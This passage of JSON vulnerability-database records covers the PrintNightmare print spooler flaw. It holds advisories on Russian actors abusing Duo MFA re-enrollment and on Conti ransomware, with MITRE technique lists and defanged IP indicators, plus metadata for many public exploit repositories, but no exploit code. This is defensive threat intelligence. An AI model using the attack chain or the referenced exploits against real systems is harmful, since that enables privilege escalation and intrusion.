"HIVEPRO:1C413EFAC97AED19F9E35574668008F9", "href": "https://www.hivepro.com/werent-you-warned-about-reactivating-the-print-spooler/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-22T07:28:58", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued an alert for enterprises that Russian state-sponsored cyber attackers have obtained network access by exploiting default MFA protocols and a known vulnerability. Russian state-sponsored cyber attackers got initial access to the target organization by using compromising credentials and registering a new device in the organization's Duo multi-factor authentication (MFA). The actors obtained the credentials using a brute-force password guessing attack, which provided them with access to a victim account with a basic, predictable password. The victim account had been unenrolled from Duo after a long period of inactivity, but it had not been deactivated in Active Directory. The actors were able to enroll a new device for this account, satisfy the authentication requirements, and get access to the victim network since Duo's default configuration settings allow for the re-enrollment of a new device for inactive accounts. Using the stolen account, Russian state-sponsored cyber attackers gained administrator rights by exploiting the "PrintNightmare" vulnerability (CVE-2021-34527). Furthermore, the cyber actors were able to obtain required material by moving laterally to the victim's cloud storage and email accounts. The organizations can apply the following mitigations: To prevent against "fail open" and re-enrollment scenarios, enforce MFA and examine configuration restrictions. Assure that inactive accounts are deactivated consistently across the Active Directory and MFA systems. Ensure that inactive accounts are deactivated equally across Active Directory, MFA systems, and other systems. Update software such as operating systems, apps, and hardware on a regular basis. The Mitre TTPs used in the current attack are:TA0001 - Initial AccessTA0003 - PersistenceTA0004 - Privilege EscalationTA0005 - Defense EvasionTA0006 - Credential AccessTA0007 - DiscoveryTA0008 - Lateral MovementTA0009 - CollectionT1078: Valid AccountsT1133: External Remote ServicesT1556: Modify Authentication ProcessT1068: Exploitation for Privilege EscalationT1112: Modify RegistryT1110.001: Brute Force: Password GuessingT1003.003: OS Credential Dumping: NTDST1018: Remote System DiscoveryT1560.001: Archive Collected Data: Archive via Utility Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 References https://www.cisa.gov/uscert/ncas/alerts/aa22-074a", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T13:58:03", "type": "hivepro", "title": "Russian threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T13:58:03", "id": "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "href": "https://www.hivepro.com/russian-threat-actors-leveraging-misconfigured-mfa-to-exploit-printnightmare-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-09-26T09:19:08", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202137.pdf>)\n\nConti Ransomware targets enterprises who have not patched their systems by exploiting old vulnerabilities. Conti Ransomware steals sensitive information from businesses and demands a ransom in exchange. CISA has issued a warning about the rise in Conti ransomware attacks. To avoid becoming a victim of Conti ransomware, the Hive Pro Threat Research team suggested you patch these vulnerabilities.\n\nThe techniques used by the Conti includes:\n\n * T1078 - Valid Accounts\n * T1133 - External Remote Services\n * T1566.001 - Phishing: Spearphishing Attachment\n * T1566.002 - Phishing: Spearphishing Link\n * T1059.003 - Command and Scripting Interpreter: Windows Command Shell\n * T1106 - Native API\n * T1055.001 - Process Injection: Dynamic-link Library Injection\n * T1027 - Obfuscated Files or Information\n * T1140 - Deobfuscate/Decode Files or Information\n * T1110 - Brute Force\n * T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting\n * T1016 - System Network Configuration Discovery\n * T1049 - System Network Connections Discovery\n * T1057 - Process Discovery\n * T1083 - File and Directory Discovery\n * T1135 - Network Share Discovery\n * T1021.002 - Remote Services: SMB/Windows Admin Shares\n * T1080 - Taint Shared Content\n * T1486 - Data Encrypted for Impact\n * T1489 - Service Stop\n * T1490 - Inhibit System Recovery\n\n#### Actor Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/1-2-1024x245.png)\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/2-3.png)\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIPV4 | 162.244.80[.]235 \n85.93.88[.]165 \n185.141.63[.]120 \n82.118.21[.]1 \n \n#### Patch Links\n\n<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-23T13:47:51", "type": "hivepro", "title": "Are you a victim of the Conti Ransomware?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-09-23T13:47:51", "id": "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "href": "https://www.hivepro.com/are-you-a-victim-of-the-conti-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2021-07-08T22:35:10", "description": "Over the past several weeks, there's been a lot of discussion about a particular privilege escalation vulnerability in Windows affecting the print spooler, dubbed PrintNightmare. The vulnerability (CVE-2021-1675/CVE-2021-34527) has now been patched multiple times but is believed to still be... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/xyAn8M5kWIs)", "cvss3": {}, "published": "2021-07-08T13:25:03", "type": "talosblog", "title": "PrintNightmare: Here\u2019s what you need to know and Talos\u2019 coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:25:03", "id": "TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/xyAn8M5kWIs/printnightmare-coverage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T00:41:37", "description": "By Edmund Brumaghin, Joe Marshall, and Arnaud Zobec. Executive Summary Another threat actor is actively exploiting the so-called PrintNightmare vulnerability (CVE-2021-1675 / CVE-2021-34527) in Windows' print spooler service to spread laterally across a victim's network as part of a recent... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/DO1FBKPzvIs)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T16:16:46", "type": "talosblog", "title": "Vice Society Leverages PrintNightmare In Ransomware Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-12T16:16:46", "id": "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DO1FBKPzvIs/vice-society-ransomware-printnightmare.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-30T03:44:07", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-29T17:24:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T03:06:53", "id": "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:13", "description": "## Kritische Sicherheitsl\u00fccke\n### PrintNightmare CVE-2021-1675, ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:52", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-05T03:00:36", "id": "0263BC36-BEB1-519B-965B-52D9E6AB116F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:22", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T08:18:40", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:07:00", "id": "F1347375-6380-5145-9881-486B76875649", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:17:11", "description": "# PrintNightmare (CVE-2021-1675)\n\nThis Zeek script detects succe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T16:44:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T16:56:12", "id": "3399B834-8492-5C0C-AA14-7F120BA37AF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:59", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T12:10:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:06:09", "id": "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:32:50", "description": "# PrintNightmare\n\nHere is a project that will help to fight agai...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T07:55:42", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-09-15T06:40:48", "id": "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T17:02:41", "description": "# PrintNightmare\n\nPython implementation for PrintNightmare (CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-26T13:53:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T13:10:07", "id": "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T19:52:51", "description": "# CVE-2021-34527 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stew...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T12:10:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T10:57:52", "id": "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:15:44", "description": "# CVE-2021-1675-LPE-EXP\n**Simple LPE Exploit of CVE-2021-1675** ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:00:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-07T15:32:16", "id": "64AAF745-D50D-575C-B3FF-A09072475502", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nTwo mini Script to check if th...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:12:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T07:49:06", "id": "F92F972D-7309-5D0B-BCC2-054883AE83E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T19:32:13", "description": "# Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-3...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:47:13", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-15T16:19:02", "id": "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:28:18", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T03:32:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-02-22T03:32:28", "id": "21F83D93-118D-50C7-A5C0-B2069237666E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:32", "description": "# Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmar...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T12:25:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 